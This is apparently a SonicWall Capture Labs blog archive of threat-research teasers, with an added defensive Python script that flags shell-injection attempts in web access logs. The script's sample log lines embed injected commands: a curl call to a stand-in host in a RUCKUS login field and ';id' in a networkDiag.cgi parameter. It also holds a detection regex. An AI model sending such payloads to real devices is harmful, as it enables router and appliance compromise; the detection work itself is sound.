Posted: September 11, 2024
Overview Microsoft’s September 2024 Patch Tuesday has 79 vulnerabilities, of which 30 are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2024 […]
Posted: September 6, 2024
Overview The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-23119, assessed its impact and developed mitigation measures for this vulnerability. CVE-2024-23119 is a high-severity SQL Injection vulnerability in Centreon, impacting Centreon […]
Posted: August 28, 2024
Overview The SonicWall Capture Labs threat research team became aware of an unauthenticated directory traversal vulnerability affecting FastAdmin installations. Identified as CVE-2024-7928 and with a moderate score of 5.3 CVSSv3, the vulnerability is more severe […]
Posted: August 27, 2024
Summary This week, the SonicWall Capture Labs threat research team observed an AutoIT-compiled executable that attempts to open Gmail login pages via MS Edge, Google Chrome and Mozilla Firefox. It has functionality to read clipboard […]
Posted: August 21, 2024
Overview The SonicWall Capture Labs threat research team became aware of an account takeover vulnerability in Cisco’s Smart Software Manager (SSM), assessed its impact and developed mitigation measures for the vulnerability. Identified as CVE-2024-20419 and […]
Posted: August 14, 2024
Overview Microsoft’s August 2024 Patch Tuesday has 87 vulnerabilities, 36 of which are Elevation of Privilege vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2024 […]
Posted: August 6, 2024
Overview The SonicWall Capture Labs threat research team became aware of an arbitrary file upload vulnerability in Progress WhatsUp Gold, assessed its impact and developed mitigation measures. WhatsUp Gold is a software that monitors every […]
Posted: August 5, 2024
Overview A fake website seemingly distributing WinRAR, a data compression, encryption and archiving tool for Windows, has also been seen hosting malware. This fake website closely resembles the official website, uses typosquatting, and capitalizes on […]
Posted: July 31, 2024
Overview The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-28747, a vulnerability in SmartPLC devices, assessed its impact and developed mitigation measures for this vulnerability. This hardcoded-credentials vulnerability affects […]
Posted: July 29, 2024
Overview The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in GeoServer, assessed its impact and developed mitigation measures. GeoServer is a community-driven project that allows users to share […]
Posted: July 17, 2024
Overview The SonicWall Capture Labs threat research team became aware of an arbitrary file read vulnerability affecting Splunk Enterprise installations. Identified as CVE-2024-36991 and given a CVSSv3 score of 7.5, the vulnerability is more severe […]
Posted: July 16, 2024
Overview The SonicWall Capture Labs threat research team has recently been tracking new ransomware known as LukaLocker. This malware has been seen in the wild over the last few weeks and is being distributed by […]
Posted: July 12, 2024
The SonicWall RTDMI™ engine has recently protected users against the distribution of the “6.6” variant of DarkGate malware by a phishing email campaign containing PDF files as an attachment. DarkGate is an advanced Remote […]
Posted: July 10, 2024
Overview Microsoft’s July 2024 Patch Tuesday has 138 vulnerabilities, 59 of which are Remote Code Execution. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July […]
Posted: July 8, 2024
Overview The SonicWall Capture Labs threat research team became aware of an XML External Entity Reference vulnerability affecting Adobe Commerce and Magento Open Source. It is identified as CVE-2024-34102 and given a critical CVSSv3 score […]
Posted: July 3, 2024
The SonicWall Capture Labs threat research team has for a long time been observing malware authors abusing QR codes embedded in PDF files to deceive users. QR codes are increasingly popular due to their […]
Posted: July 3, 2024
Overview The SonicWall Capture Labs threat research team became aware of a path traversal vulnerability in SolarWinds Serv-U, assessed its impact and developed mitigation measures. Serv-U server is a solution that provides a secure file […]
Posted: June 27, 2024
Overview This week, the SonicWall Capture Labs threat research team investigated a sample of Orcinius malware. This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated. […]
Posted: June 27, 2024
DarkMe RAT steals information from victims’ machines and responds to various commands received from its Command and Control (C&C) server. A spike in distributing DarkMe RAT was observed in February 2024, exploiting the zero-day (CVE-2024-21412) […]
Posted: June 24, 2024
The SonicWall Capture Labs threat research team has been tracking StrelaStealer for a long time. Recently, in the third week of June, we observed a huge spike in JavaScript spreading StrelaStealer. StrelaStealer specifically steals Outlook […]
Posted: June 20, 2024
Overview The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild argument injection vulnerability, leading to remote code execution, affecting PHP on Windows when run in CGI mode. Identified as CVE-2024-4577 and given a CVSSv3 score of 9.8, […]
Posted: June 11, 2024
Overview Microsoft’s June 2024 Patch Tuesday has 49 vulnerabilities, 24 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June […]
Posted: June 5, 2024
Overview The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is […]
Posted: June 4, 2024
Overview This week, the SonicWall Capture Labs Research team analyzed a sample of Linux ransomware. The group behind this ransomware, called INC Ransomware, has been active since it was first reported a year ago. Infection […]
Posted: May 30, 2024
Overview The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in the Atlassian Confluence Data Center and Server, assessed its impact and developed mitigation measures. Confluence Server is a […]
Posted: May 23, 2024
Overview The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability, an SQL injection in the ValvePress Automatic WordPress plugin, assessed its impact and developed mitigation measures for it. Around […]
Posted: May 21, 2024
The SonicWall Capture Labs threat research team has been observing a growth of malware built using the Chaos ransomware builder. The sample we have analyzed here is built using this kit, however, it is not […]
Posted: May 14, 2024
Overview Microsoft’s May 2024 Patch Tuesday has 59 vulnerabilities, 25 of which are Remote Code Execution vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of […]
Posted: May 14, 2024
Overview This week, the SonicWall Capture Labs threat research team investigated a sample of the RemcosRAT that uses a PrivateLoader module to provide additional data and persistence on the victim’s machine. By installing VB scripts, […]
Posted: May 13, 2024
Overview The SonicWall Capture Labs threat research team became aware of CVE-2024-31984, which is a code injection vulnerability in XWiki’s management of space titles and has a critical CVSS score of 9.9. After assessing the […]
Posted: May 1, 2024
Overview SonicWall Capture Labs threat research team became aware of a fully unauthenticated server-side template injection vulnerability within CrushFTP, assessed its impact, and developed mitigation measures. CrushFTP is an enterprise file transfer tool. Such tools […]
Posted: April 30, 2024
Overview This week the SonicWall Capture Labs threat research team came across a sample purporting to be Windows Explorer. At a glance, everything checks out – it uses the legitimate Windows Explorer icon and the […]
Posted: April 29, 2024
Overview The SonicWall Capture Labs threat research team has been regularly sharing information about malware targeting Android devices. We’ve encountered similar RAT samples before, but this one includes extra commands and phishing attacks designed to […]
Posted: April 25, 2024
Overview The SonicWall Capture Labs threat research team became aware of a cross-site scripting vulnerability in GitLab, assessed its impact and developed mitigation measures. GitLab, an open-source code-sharing platform, published an advisory on this vulnerability […]
Posted: April 23, 2024
Overview SonicWall Capture Labs threat research team has observed fileless .Net managed code injection in a native 64-bit process. Native code or unmanaged code refers to low-level compiled code such as C/C++. Managed code refers […]
Posted: April 22, 2024
Overview The SonicWall Capture Labs threat research team has recently been tracking ransomware known as HydraCrypt. HydraCrypt originates from the CryptBoss ransomware family and was first seen in early 2016. The sample that we analyzed […]
Posted: April 19, 2024
Overview The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability, an unauthenticated template injection in Atlassian Confluence platforms, assessed its impact and developed mitigation measures for it. Atlassian’s Confluence Server and Data […]
Posted: April 9, 2024
Overview Microsoft’s April 2024 Patch Tuesday has 147 vulnerabilities, 68 of which are Remote Code Execution (RCE) vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for April 2024 […]
Posted: April 5, 2024
Overview The SonicWall Capture Labs threat research team analyzed a malware purporting to be a Java utility. It arrives as an installer for Java Access Bridge, but ultimately installs the popular open-source cryptominer, XMRig. Infection […]
Posted: April 5, 2024
Overview The SonicWall Capture Labs threat research team became aware of two remote code execution vulnerabilities in JumpServer, assessed their impact and developed mitigation measures. JumpServer is an open-source bastion host and a […]
Posted: April 3, 2024
Overview The SonicWall Capture Labs threat research team has recently been tracking ransomware created using the Chaos ransomware builder. The builder appeared in June 2021 and has been used by many operators to infect victims and […]
Posted: April 2, 2024
Overview SonicWall Capture Labs threat research team has observed an updated variant of StrelaStealer. StrelaStealer is an infostealer malware known for targeting Spanish-speaking users and focuses on stealing email account credentials from Outlook and Thunderbird. […]
Posted: March 27, 2024
Overview The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability, an unauthenticated command injection in Progress Kemp LoadMaster, assessed its impact and developed mitigation measures for it. Kemp Technologies’ […]
Posted: March 25, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a new Golang malware sample. It uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to […]
Posted: March 20, 2024
Overview The SonicWall Capture Labs threat research team became aware of a deserialization vulnerability in the Artica Proxy appliance, assessed its impact and developed mitigation measures. Artica Proxy is a comprehensive proxy solution performing tasks such […]
Posted: March 18, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a ransomware calling itself Lighter Ransomware. Upon execution, it opens up a window with a countdown timer instructing the victim to reach out immediately […]
Posted: March 18, 2024
Overview SonicWall Capture Labs threat research team has observed a new variant of WhiteSnake Stealer. This stealer poses significant risks to users and organizations as it can steal critical sensitive data from compromised systems, including […]
Posted: March 13, 2024
Overview The SonicWall RTDMI™ engine has recently detected Windows Shortcut Files (LNKs) inside archives that execute LokiBot malware on the victim’s machine. The malicious LNK file is packed inside an archive along with a […]
Posted: March 12, 2024
Overview Microsoft’s March 2024 Patch Tuesday has 59 vulnerabilities – 26 of which are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March […]
Posted: March 12, 2024
Overview The SonicWall Capture Labs threat research team recently observed an interesting variant of StopCrypt ransomware. The ransomware executes its malicious activities by utilizing multi-stage shellcodes before launching a final payload that contains the file […]
Posted: March 8, 2024
Overview The SonicWall Capture Labs threat research team has been tracking ransomware that has gained recent notoriety known as Medusa. Medusa surfaced as a Ransomware-as-a-Service (RaaS) platform in late 2022. The group behind Medusa predominantly […]
Posted: March 8, 2024
Overview The SonicWall Capture Labs Threat research team has regularly monitored hidden adware on Android. These misleading apps show ads and collect user data to make money from advertisements. They trick users into clicking on […]
Posted: March 7, 2024
Overview The SonicWall Capture Labs threat research team became aware of two noteworthy vulnerabilities in JetBrains TeamCity, an authentication bypass and a path traversal, assessed their impact and developed […]
Posted: March 4, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a sample of Marsilia malware, also known as Mallox. This is a multi-stage sample that, when functional, will have a first stage that enumerates […]
Posted: March 1, 2024
Overview Threat actors are continuously evolving their malware code to evade security defenses. The SonicWall Capture Labs threat research team has observed that the latest variant of DBatLoader has included an old version of […]
Posted: February 29, 2024
Overview SonicWall Capture Labs Threat Research Team became aware of the MonikerLink Remote Code Execution vulnerability (CVE-2024-21413) in Microsoft Outlook, assessed its impact and developed mitigation measures for the vulnerability. Microsoft Outlook is a globally […]
Posted: February 22, 2024
SonicWall Capture Labs Threat Research Team became aware of the ClamAV VirusEvent command injection vulnerability (CVE-2024-20328), assessed its impact, and developed mitigation measures for the vulnerability. ClamAV is a notable, open-source anti-virus engine, widely recognized […]
Posted: February 16, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a ransomware targeting users who speak English and Standard Chinese. Its behavior is typical of ransomware – it encrypts the user’s files and provides […]
Posted: February 13, 2024
Overview Microsoft’s February 2024 Patch Tuesday has 72 vulnerabilities, 30 of which are Remote Code Execution. The vulnerabilities can be classified into the following categories: 30 Remote Code Execution vulnerabilities, 17 Elevation of Privilege […]
Posted: February 9, 2024
The SonicWall Capture Labs threat research team has been tracking ransomware that encrypts files and claims to charge only $100 for file retrieval. It is written in .NET and obfuscated using Eziriz’s .NET Reactor. However, […]
Posted: February 8, 2024
Overview Ivanti disclosed two more vulnerabilities: a server-side request forgery (CVE-2024-21893) and a privilege escalation (CVE-2024-21888). This disclosure comes only a few weeks after confirming an exploit chain impacting Ivanti Connect Secure and […]
Posted: January 31, 2024
Overview The SonicWall Capture Labs threat research team became aware of the Jenkins CLI (command-line-interface) arbitrary file read vulnerability, assessed its impact and developed mitigation measures for the vulnerability. Jenkins is a Java-based automation tool […]
Posted: January 29, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a sample tied to the Blackwood APT group. This is a DLL that, when loaded onto a victim’s computer, will escalate privileges and attempt […]
Posted: January 25, 2024
Overview The SonicWall Capture Labs threat research team became aware of the Ivanti Connect Secure and Policy Secure Gateway authentication bypass vulnerability, assessed its impact and developed mitigation measures for the vulnerability. Ivanti Connect Secure, […]
Posted: January 18, 2024
Overview The SonicWall Capture Labs threat research team became aware of an account takeover via password reset vulnerability in GitLab, assessed its impact and developed mitigation measures for the vulnerability. GitLab, an open-source code-sharing platform, […]
Posted: January 18, 2024
Overview The SonicWall Capture Labs threat research team has recently observed a new variant of Diavol ransomware. The ransomware executes its malicious activities by utilizing bitmap objects containing binary code and paired JPEG objects containing […]
Posted: January 13, 2024
This week, the SonicWall Capture Labs threat research team analyzed a full-featured infostealer and remote access trojan that also has ransomware functionality built in. This trojan is capable of terminating applications, logging keystrokes, opening web […]
Posted: January 9, 2024
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2024.
Posted: January 5, 2024
Overview The SonicWall Capture Labs threat research team has observed attackers targeting the Simple Mail Transfer Protocol (SMTP) to send spoofed emails that can bypass traditional authentication mechanisms. A flaw tracked as three separate CVEs, CVE-2023-51764, […]
Posted: January 5, 2024
The SonicWall Capture Labs threat research team has been tracking a new ransomware family known as Uransomware. This ransomware appears to be in early development. The sample we analyzed does not ask for payment for […]
Posted: January 2, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a new sample of an infostealer dubbed ‘Heracles’, which has multiple evasion and persistence techniques. The malware is programmed to search for system credentials, […]
Posted: December 28, 2023
Overview The SonicWall Capture Labs threat research team became aware of a command injection vulnerability within OpenSSH versions before 9.6, assessed its impact, and developed mitigation measures for the vulnerability. OpenSSH is a widely used connectivity […]
Posted: December 27, 2023
Overview For the last three years, GuLoader has gained popularity among threat actors, due to its sophisticated, robust, and powerful defense techniques against security software. The SonicWall Capture Labs Threat Research team has observed that […]
Posted: December 21, 2023
Overview The SonicWall Capture Labs threat research team became aware of an unauthorized arbitrary file upload vulnerability in Apache Struts, assessed its impact and developed mitigation measures for the vulnerability. Apache Struts, an open-source MVC […]
Posted: December 20, 2023
Overview The SonicWall Capture Labs threat research team has been actively tracking malware campaigns deploying a formidable Android Remote Access Trojan (RAT). We encountered a variant of that malware equipped with extensive features such as […]
Posted: December 20, 2023
Overview The SonicWall Capture Labs threat research team has observed and detected a VBScript file which delivers XWorm3.1 to the victim’s machine. The trend of malware authors hiding behind a genuine tool is continuing, and […]
Posted: December 19, 2023
Overview The SonicWall Capture Labs threat research team has observed PDF files masquerading as Ring Central, which is a communication and collaboration platform. This is achieved by incorporating malicious URLs with the intention of executing […]
Posted: December 15, 2023
Overview This week, the SonicWall Capture Labs threat research team analyzed a fake copy of AnyDesk. AnyDesk is a legitimate remote desktop application commonly used by tech support agents to troubleshoot computer problems remotely and […]
Posted: December 15, 2023
The SonicWall Capture Labs threat research team has recently been tracking a new variant of Thanos ransomware. It is named after the Marvel supervillain and, according to the FBI, was created by Moises Luis Zagala […]
Posted: December 15, 2023
Overview This week the SonicWall Capture Labs threat research team investigated a sample of malware that has multiple infostealer, monitoring and C2 capabilities. The name of the file is translated as ‘Easy Language Program’ from […]
Posted: December 13, 2023
The SonicWall Capture Labs Threat Research team has observed Remcos RAT (Remote Access Trojan) being distributed by adding malicious code to existing open-source software. This appears to be an attempt to evade security products which […]
Posted: December 12, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2023.
Posted: December 7, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the threat CVE-2023-34048 (a vCenter Server out-of-bounds write vulnerability), assessed its impact, and developed mitigation measures for the vulnerability. VMware vCenter Server is a centralized […]
Posted: December 7, 2023
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Splunk Enterprise. Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply. This means that […]
Posted: November 30, 2023
Overview This week, the SonicWall Capture Labs Threat Research Team became aware of a disclosure of sensitive information vulnerability in ownCloud’s GraphAPI application, assessed its impact and developed mitigation measures for the vulnerability. ownCloud, an […]
Posted: November 27, 2023
Overview Recently, the SonicWall Capture Labs Threat Research team has identified a new .NET packer that is currently being widely used by various stealers such as LokiBot and Agent Tesla. In the ever-evolving landscape of […]
Posted: November 21, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, […]
Posted: November 18, 2023
Overview This week, the SonicWall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server. Infection Cycle The […]
Posted: November 15, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023.
Posted: November 9, 2023
The SonicWall Capture Labs Threat Research team has observed the Agent Tesla infostealer being deployed using image (.jpg) files for the last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen […]
Posted: November 9, 2023
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Apache ActiveMQ allowing a remote attacker with network access to a broker to run arbitrary shell commands by manipulating […]
Posted: November 3, 2023
The SonicWall threat research team has recently been tracking a new ransomware family called Payola. This family of ransomware appeared in late August 2023. It is written in .NET and is easy to analyze as […]
Posted: November 3, 2023
Sunhillo SureLine versions before 8.7.0.1.1 contain an unauthenticated OS command injection vulnerability through the ipAddr or dnsAddr parameters within the networkDiag.cgi script.
Posted: October 26, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the threat Citrix Bleed, assessed its impact and developed mitigation measures for the vulnerability. Citrix NetScaler is an Application Delivery Controller (ADC) and load balancer […]
Posted: October 20, 2023
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center allowing unauthorized users to get administrative-level privileges by creating unauthorized […]
Posted: October 16, 2023
This week, the SonicWall Capture Labs Research Team looked at a sample of Mystic Stealer. This is an infostealer that first appeared earlier in 2023. It has a variety of defensive techniques to evade detection […]
Posted: October 13, 2023
SonicWall Capture Labs Threat Research Team became aware of the threat, assessed its impact, and developed mitigation measures for the curl SOCKS5 heap buffer overflow vulnerability released this week. Overview Client URL, or curl, and […]
Posted: October 10, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2023.
Posted: October 6, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the threat, assessed its impact, and developed mitigation measures for JetBrains TeamCity Server. JetBrains TeamCity, a robust continuous integration (CI) and continuous deployment (CD) server, […]
Posted: September 28, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: phpPgAdmin is an open-source, web-based administration tool for managing PostgreSQL, an advanced, enterprise-class, and open-source relational database system. phpPgAdmin is written in PHP […]
Posted: September 22, 2023
Improper error message handling in Zyxel ZyWALL/USG, VPN, USG FLEX and ATP firmware series could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.
Posted: September 22, 2023
This week, the SonicWall Capture Labs Research team analyzed the latest Snatch ransomware. Snatch operates as a ransomware-as-a-service (RaaS), a business model where the malware authors lease out the ransomware program to affiliates who then […]
Posted: September 12, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2023.
Posted: September 8, 2023
The SonicWall Capture Labs threat research team has been tracking a recent family of ransomware called RZML. This ransomware appeared in the wild over the last 7 days and appears to be a variant of […]
Posted: September 8, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: KSMBD is an integral server component within the Linux kernel. Its primary function is to implement the SMBv3 protocol, which is essential for […]
Posted: September 1, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Rockwell Automation’s ThinManager is designed for managing thin clients, mobile devices, cameras, and industrial devices. Comprising both client and server components, the client […]
Posted: August 25, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Redis stands as an in-memory, high-performance key-value data store that is both lightweight and non-volatile. Designed to offer quick access to simple yet […]
Posted: August 25, 2023
This week, the SonicWall Capture Labs Threat Research Team has observed the following threat: The Amadey botnet malware has been packaged with a RedLine infostealer to infiltrate systems, extract a variety of information, and enable control […]
Posted: August 18, 2023
RUCKUS Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET request, as demonstrated by a request containing the substring /forms/doLogin?login_username=admin&password=password$(curl.
Posted: August 11, 2023
Bring Your Own Vulnerable Driver (BYOVD)
Posted: August 8, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2023.
Posted: August 4, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The Netgear ProSAFE Network Management System (NMS300) is a centralized and comprehensive management application designed for network administrators. It enables them to discover, […]
Posted: August 1, 2023
The SonicWall Capture Labs Research team has received a sample of a new variant of the Chaos ransomware family, a customizable ransomware builder that emerged on underground forums, falsely marketing itself as the […]
Posted: July 27, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: XWiki is recognized as a second-generation wiki platform, bringing together the conventional wiki functionality and the unique potential of an application development platform. […]
Posted: July 21, 2023
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contain a command injection vulnerability in the web management interface. By injecting malicious commands, an attacker could execute them as the root user, potentially gaining unauthorized access to and control over the router.
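The three web-interface command injections summarised above (Sunhillo SureLine's networkDiag.cgi ipAddr/dnsAddr parameters, the RUCKUS /forms/doLogin request, and the TP-Link Archer AX21 management interface) share one trait a defender can key on: shell metacharacters such as $( or ; arriving in a field that should only ever hold an IP address, hostname or username. The script below is an added example written for this page, not SonicWall's code or any vendor's detection signature. It parses web-server access logs in the common "combined" format, URL-decodes every query parameter, and flags values containing shell-breakout sequences. The log lines are constructed samples, and the parameter names, paths and IP addresses in them are illustrative assumptions drawn from the advisory text, not captured traffic.

```python
"""Added example (not SonicWall's or any vendor's code): flag shell-metacharacter
injection attempts in web-server access logs of the kind used against
networkDiag.cgi (ipAddr/dnsAddr), /forms/doLogin and router management CGIs."""
import re
from urllib.parse import urlsplit, parse_qsl

# Sequences that have no business inside an IP address, hostname or login
# field but are needed to break out into a shell: $(...), backticks, ${...},
# command separators and pipes, and embedded newlines.
SHELL_META = re.compile(r"\$\(|`|\$\{|\|\||&&|[;|\n]")

# Apache/nginx "combined" log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (assumption: not real traffic). The first two carry
# percent-encoded payloads, %24%28 = "$(" and %3B = ";", so that naive string
# matching on the raw line would miss them; the last two are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Aug/2023:10:01:02 +0000] "GET /forms/doLogin?login_username=admin&password=password%24%28curl+http%3A%2F%2F203.0.113.9%2Fx%29 HTTP/1.1" 200 512 "-" "curl/8.1"
203.0.113.6 - - [03/Nov/2023:11:15:44 +0000] "GET /cgi-bin/networkDiag.cgi?ipAddr=127.0.0.1%3Bid&dnsAddr=8.8.8.8 HTTP/1.1" 200 300 "-" "python-requests/2.31"
198.51.100.7 - - [03/Nov/2023:11:16:01 +0000] "GET /cgi-bin/networkDiag.cgi?ipAddr=10.0.0.1&dnsAddr=10.0.0.2 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.8 - - [21/Jul/2023:09:00:00 +0000] "POST /cgi?2 HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def find_injection_attempts(log_text):
    """Return one dict per (request, parameter) whose decoded value contains a
    shell-breakout sequence. Only the query string is visible in access logs;
    POST bodies (the usual vehicle for router management CGIs such as the
    TP-Link case) need a proxy or WAF log that records the body."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m["target"])
        # parse_qsl decodes %XX escapes and "+" so encoded payloads are seen.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SHELL_META.search(value):
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "path": url.path,
                    "param": name,
                    "value": value,
                })
    return hits


if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]} {hit["param"]}={hit["value"]!r}')
```

Decoding before matching is the point of the example: the RUCKUS payload is only recognisable as $(curl once %24%28 has been decoded, and a raw-line signature for the literal characters would miss it. Tighten SHELL_META to the parameters a given endpoint actually accepts before deploying on busy servers, since "|" and ";" also occur in legitimate search or filter fields.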
Posted: July 11, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2023.
Posted: July 7, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: OpenEMR is a comprehensive open-source electronic health records (EHR) and medical practice management application. It provides an array of functionalities aimed at enhancing […]
Posted: July 5, 2023
SonicWall Capture Labs Research team recently observed Agent Tesla malware being loaded by a native loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed using the Microsoft .NET framework and capable of stealing sensitive information. It has become one of the most prevalent malware families over the past couple of years.
Posted: June 30, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: OpenSSL stands as a renowned open-source library, primarily utilized for SSL and TLS. The Secure Socket Layer (SSL) and the Transport Layer Security […]
Posted: June 26, 2023
SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use […]
Posted: June 23, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as […]
Posted: June 21, 2023
SonicWall Capture Labs Threat research team recently discovered a campaign requesting users to provide their card details on a fraudulent bank application under the pretense of claiming rewards points. Additionally, they persuade users to enable […]
Posted: June 15, 2023
SonicWall Capture Labs Research team recently observed a new variant of Amadey malware. Amadey is a botnet whose main objectives are stealing sensitive information and injecting additional payloads by receiving commands from its command and control server. In this variant we observed that it has modified its string decoding algorithm.
Posted: June 13, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2023.
Posted: June 9, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: MOVEit provides secure collaboration and automated file transfers of sensitive data and advanced workflow automation capabilities without the need for scripting. Encryption and […]
Posted: June 9, 2023
With the popularity of ChatGPT, an artificial intelligence (AI) chatbot, cybercriminals have been using it to lure unsuspecting victims into online scams. Recently, the SonicWall Capture Labs Research team has come across a scam promising […]
Posted: June 2, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The vulnerability labeled as CVE-2023-2951 is a critical issue found in the “Code-Projects” Bus Dispatch and Information System version 1.0, specifically involving a […]
Posted: May 31, 2023
In this blog post, we will discuss:
Unpacking of GuLoader’s shellcodes.
Understanding a new anti-debug technique deployed by GuLoader.
Deep dive into GuLoader’s custom Vectored Exception Handler.
Writing an IDAPython script to deobfuscate the control flow of the shellcode and to make GuLoader’s analysis easy and fast.
Posted: May 26, 2023
A vulnerability in DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
Posted: May 26, 2023
Recently, SonicWall Capture Labs Threat research team discovered a .NET stealer malware with enormous capabilities, including stealing information from browsers, VPNs, Steam profiles, installed apps, cryptocurrency wallets, cryptocurrency wallet browser extensions and sensitive device […]
Posted: May 19, 2023
LB-Link is a well-known company in the networking industry that specializes in the design, manufacturing, and distribution of wireless networking products. The company’s product portfolio includes a wide range of wireless routers, network adapters, Wi-Fi […]
Posted: May 19, 2023
The SonicWall Capture Labs threats research team has been tracking a newly discovered form of ransomware called “Akira”. This malicious software is actively targeting numerous organizations and stealing sensitive data. To maximize the likelihood of […]
Posted: May 9, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2023.
Posted: May 9, 2023
SonicWall Capture Labs Research team analyzed a Raspberry Robin sample, which is known for its endless evasion techniques and multiple layers of packing. The layers have several anti-debugger, anti-sandbox, anti-VM and anti-emulator checks. The malware has kept evolving, intensifying the hide-and-seek game over time and improving it with a variety of original evasions and tactics.
Posted: May 9, 2023
SonicWall Capture Labs Threat research team recently discovered a malware campaign that utilizes a Remote Access Trojan (RAT) with enormous capabilities, including keylogging, stealing sensitive device information, bypassing Google Authenticator, etc. These features allow the […]
Posted: May 5, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Adobe ColdFusion is a powerful web development platform that enables developers to create dynamic, data-driven websites and applications with ease. ColdFusion Markup Language […]
Posted: May 5, 2023
Overview: This week, SonicWall Capture Labs Threat Research Team analyzed a Linux backdoor sample, labelled as ‘Gafgyt’, that targets multiple platforms and acts as an enumeration tool, downloader, and C2 agent. This sample is a […]
Posted: April 28, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: vBulletin is written in PHP and uses MySQL as its database management system. It is designed to provide a robust platform for online […]
Posted: April 24, 2023
Delivering malicious PDF documents as email attachments is the easiest way for threat actors to get into a victim’s machine, whether through phishing or through embedded scripts that deliver malware payloads. This time SonicWall Capture Labs […]
Posted: April 21, 2023
An externally controlled reference to a resource vulnerability exists in QNAP NAS running Photo Station. If exploited, this could allow an attacker to modify system files.
Posted: April 18, 2023
